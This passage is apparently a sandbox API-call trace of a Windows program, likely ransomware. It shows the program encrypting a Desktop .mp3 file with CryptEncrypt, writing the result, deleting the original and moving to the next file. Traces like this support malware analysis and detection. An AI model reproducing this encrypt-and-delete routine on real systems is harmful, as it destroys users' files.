hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0125.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0125.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.473] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.474] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xdbcb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xdbd0) returned 1 [0125.474] CharLowerBuffW (in: lpsz="byte[56273]", cchLength=0xb | out: lpsz="byte[56273]") returned 0xb [0125.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.474] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d3398*, pdwDataLen=0x144e790*=0xdbcb, dwBufLen=0xdbd0 | out: pbData=0x49d3398*, pdwDataLen=0x144e790*=0xdbd0) returned 1 [0125.474] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.478] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xdbd0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0xdbd0, lpOverlapped=0x0) returned 1 [0125.480] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0125.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0125.480] CryptDestroyKey (hKey=0x41ac640) returned 1 [0125.480] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.481] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0125.481] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0125.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.481] FreeLibrary (hLibModule=0x756e0000) returned 1 [0125.481] CloseHandle (hObject=0x258) returned 1 [0125.481] CloseHandle (hObject=0x2a0) returned 1 [0125.484] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3", lpFilePart=0x0) returned 0x28 [0125.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0125.484] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\oifah-1_nryv.mp3")) returned 0x20 [0125.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0125.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0125.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0125.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0125.485] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8245c0, ftCreationTime.dwHighDateTime=0x1d5f04f, ftLastAccessTime.dwLowDateTime=0x246b8b00, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x246b8b00, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0xdbcb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oIFaH-1_nryv.mp3", cAlternateFileName="OIFAH-~1.MP3")) returned 0x41ac500 [0125.485] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\oifah-1_nryv.mp3")) returned 1 [0125.497] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8245c0, ftCreationTime.dwHighDateTime=0x1d5f04f, ftLastAccessTime.dwLowDateTime=0x246b8b00, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x246b8b00, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0xdbcb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oIFaH-1_nryv.mp3", cAlternateFileName="OIFAH-~1.MP3")) returned 0 [0125.497] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0125.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0125.498] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0125.498] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0125.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0125.499] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.499] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0125.499] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0125.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0125.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0125.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0125.500] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0125.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.500] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.501] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc4f60, ftCreationTime.dwHighDateTime=0x1d5ea39, ftLastAccessTime.dwLowDateTime=0xee99dd0, ftLastAccessTime.dwHighDateTime=0x1d5e81b, ftLastWriteTime.dwLowDateTime=0xee99dd0, ftLastWriteTime.dwHighDateTime=0x1d5e81b, nFileSizeHigh=0x0, nFileSizeLow=0x1449e, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="QKxk.mp3", cAlternateFileName="")) returned 0x41ac100 [0125.501] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0125.501] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0125.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0125.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0125.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0125.502] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0125.503] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0125.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0125.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 